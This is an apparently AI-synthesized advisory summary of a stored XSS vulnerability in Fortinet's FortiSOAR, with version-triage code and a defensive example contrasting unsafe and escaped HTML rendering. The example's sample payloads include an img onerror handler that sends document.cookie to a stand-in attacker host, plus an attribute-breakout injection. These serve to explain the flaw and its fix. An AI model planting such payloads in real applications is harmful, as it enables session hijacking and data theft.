VYPR
Advisory · Published Apr 14, 2026 · Updated May 20, 2026 · 1 source

Fortinet Warns of Stored XSS Vulnerability in FortiSOAR

Fortinet disclosed a stored cross-site scripting vulnerability in FortiSOAR that allows authenticated remote attackers to execute malicious scripts via crafted HTTP requests.

Fortinet has disclosed a stored cross-site scripting (XSS) vulnerability in its FortiSOAR security orchestration, automation, and response (SOAR) platform. Classified as CWE-79 (improper neutralization of input during web page generation) and published under advisory FG-IR-26-117, the flaw allows an authenticated remote attacker to inject malicious scripts into the Reports View page via crafted HTTP requests. Fortinet rates it at a CVSSv3 score of 4.4, which places it in the Medium severity band.

The vulnerability affects FortiSOAR PaaS and on-premise deployments alike, and the affected ranges are the same for both: 7.6.0 through 7.6.3, 7.5.0 through 7.5.2, and every release of the 7.4 and 7.3 branches. Fixes are available on the supported branches: upgrade to 7.6.4 or above, or to 7.5.3 or above. For the 7.4 and 7.3 branches, which are no longer under standard support, the advisory lists no patched release; users on those branches are advised to migrate to a fixed release on a supported branch.
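A quick way to triage an inventory of FortiSOAR instances against the ranges above, as an added example (not Fortinet's code, and not derived from the advisory's own tooling). It encodes the affected ranges exactly as stated in this summary; the assumption that a version string begins with "major.minor.patch" and that any trailing build suffix can be ignored is mine. Branches the advisory does not mention are reported as "not listed", not as safe.

```javascript
// Added example: classify a FortiSOAR version against the FG-IR-26-117 affected ranges
// as summarised above. Assumption: versions start with "major.minor.patch"; anything
// after the patch number (e.g. a build tag) is ignored.

function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error(`unrecognised version string: ${v}`);
  return m.slice(1, 4).map(Number);
}

// Numeric component-wise comparison, so 7.6.10 sorts after 7.6.3 (a plain string
// comparison would get this wrong).
function cmpVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Affected ranges per the advisory summary; the same table applies to PaaS and on-premise.
// from/to of null means the whole branch is affected and no fixed release exists on it.
const AFFECTED = [
  { branch: '7.6', from: '7.6.0', to: '7.6.3', action: 'upgrade to 7.6.4 or above' },
  { branch: '7.5', from: '7.5.0', to: '7.5.2', action: 'upgrade to 7.5.3 or above' },
  { branch: '7.4', from: null, to: null, action: 'migrate to a fixed release' },
  { branch: '7.3', from: null, to: null, action: 'migrate to a fixed release' },
];

function assess(version) {
  const v = parseVersion(version);
  const entry = AFFECTED.find(e => e.branch === `${v[0]}.${v[1]}`);
  if (!entry) {
    // Deliberately not "safe": the advisory simply does not list this branch.
    return { version, affected: false, note: 'branch not listed in the advisory' };
  }
  if (entry.from === null) {
    return { version, affected: true, action: entry.action };
  }
  const inRange =
    cmpVersions(v, parseVersion(entry.from)) >= 0 &&
    cmpVersions(v, parseVersion(entry.to)) <= 0;
  return inRange
    ? { version, affected: true, action: entry.action }
    : { version, affected: false, note: 'at or above the fixed release' };
}

// Usage: constructed sample inventory, not real hosts.
for (const v of ['7.6.3', '7.6.4', '7.5.1', '7.4.2 build 1234', '7.2.0']) {
  console.log(JSON.stringify(assess(v)));
}
```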

The vulnerability was discovered internally and reported by Shripal Rawal of the Fortinet PSIRT team. Stored XSS is more dangerous than its reflected counterpart because the payload is persisted in the application's data rather than carried in a single crafted link: it runs in the browser of every user who later opens the affected page, with that user's session and permissions. In a SOAR platform such as FortiSOAR, which centralizes security operations and holds playbooks, integration credentials, and incident data, a script running as a privileged analyst or administrator could read that data, act through the platform in the victim's name, or hijack the session, giving an attacker a foothold for further movement within the environment.

Fortinet's advisory notes that exploitation requires authentication, which lowers the score but does not remove the risk. An attacker who has already obtained low-level access to FortiSOAR can plant the payload, and the script then executes for any higher-privileged user who views the Reports View page; that is how a stored XSS becomes a route to privilege escalation or to exfiltrating data from other users' authenticated sessions. The CVSSv3 score of 4.4 reflects the need for authenticated access and the limited, rather than total, impact on confidentiality and integrity.
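The mechanism described in the two paragraphs above, shown as an added example rather than FortiSOAR's own code: a value saved once by a low-privileged user is later rendered into a page that a more privileged user views. The advisory does not say which field on the Reports View page is involved, so the record shape, the field names, and the two payloads below are constructed for illustration; the vulnerable renderer concatenates stored strings straight into markup, and the hardened one escapes each value for the context it lands in (element body and attribute value).

```javascript
// Added example, not FortiSOAR code. Models stored XSS generically: untrusted data is
// written to storage by one user and rendered for another. Field names are assumptions.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape for HTML text and double-quoted attribute contexts. Quotes are included so a
// value cannot break out of an attribute and add an event handler.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ESCAPES[ch]);
}

// Constructed sample of what an authenticated but low-privileged user might save.
// The first payload injects a tag into element text; the second breaks out of an
// attribute value. attacker.invalid is a reserved, non-resolving name.
const STORED_REPORT = {
  title: '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">',
  owner: 'analyst" onmouseover="alert(document.domain)',
};

// Vulnerable pattern: stored strings are concatenated directly into the row markup.
function renderRowUnsafe(r) {
  return `<tr><td>${r.title}</td><td title="${r.owner}">${r.owner}</td></tr>`;
}

// Hardened pattern: every untrusted value is escaped before it reaches the markup.
function renderRow(r) {
  const title = escapeHtml(r.title);
  const owner = escapeHtml(r.owner);
  return `<tr><td>${title}</td><td title="${owner}">${owner}</td></tr>`;
}

// Crude check for the tests: is there an opening tag other than the template's own
// <tr>/<td>? It only detects the tag-injection case; the attribute case is checked
// by inspecting the rendered title attribute directly.
function hasInjectedTag(html) {
  return /<(?!\/?t[rd]\b)[a-z]/i.test(html);
}

// Usage: show both renderings side by side.
console.log('unsafe:', renderRowUnsafe(STORED_REPORT));
console.log('safe:  ', renderRow(STORED_REPORT));
```

Escaping at the sink is the class of fix a developer applies; for FortiSOAR itself the only remedy the advisory offers is the upgrade.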

This disclosure comes amid a broader trend of vulnerabilities being reported in SOAR and other security management platforms. As organizations lean on automation to handle incidents, these platforms accumulate privileged integrations and credentials, and their attack surface grows with them. Fortinet's PSIRT team regularly publishes internally discovered flaws, and this advisory is one such case.

Fortinet has not reported any active exploitation of this vulnerability in the wild. However, given the widespread deployment of FortiSOAR in enterprise environments, administrators are strongly encouraged to apply the available patches or migrate to supported versions as soon as possible. The advisory was published on April 14, 2026, with no workarounds provided beyond upgrading.

For organizations still on the unsupported 7.4 and 7.3 branches, migrating to a fixed release is the priority, since those branches will not receive further security updates. The advisory is a reminder that keeping software current is essential for reducing exposure to known vulnerabilities, including those that require prior authentication to exploit.

Synthesized by Vypr AI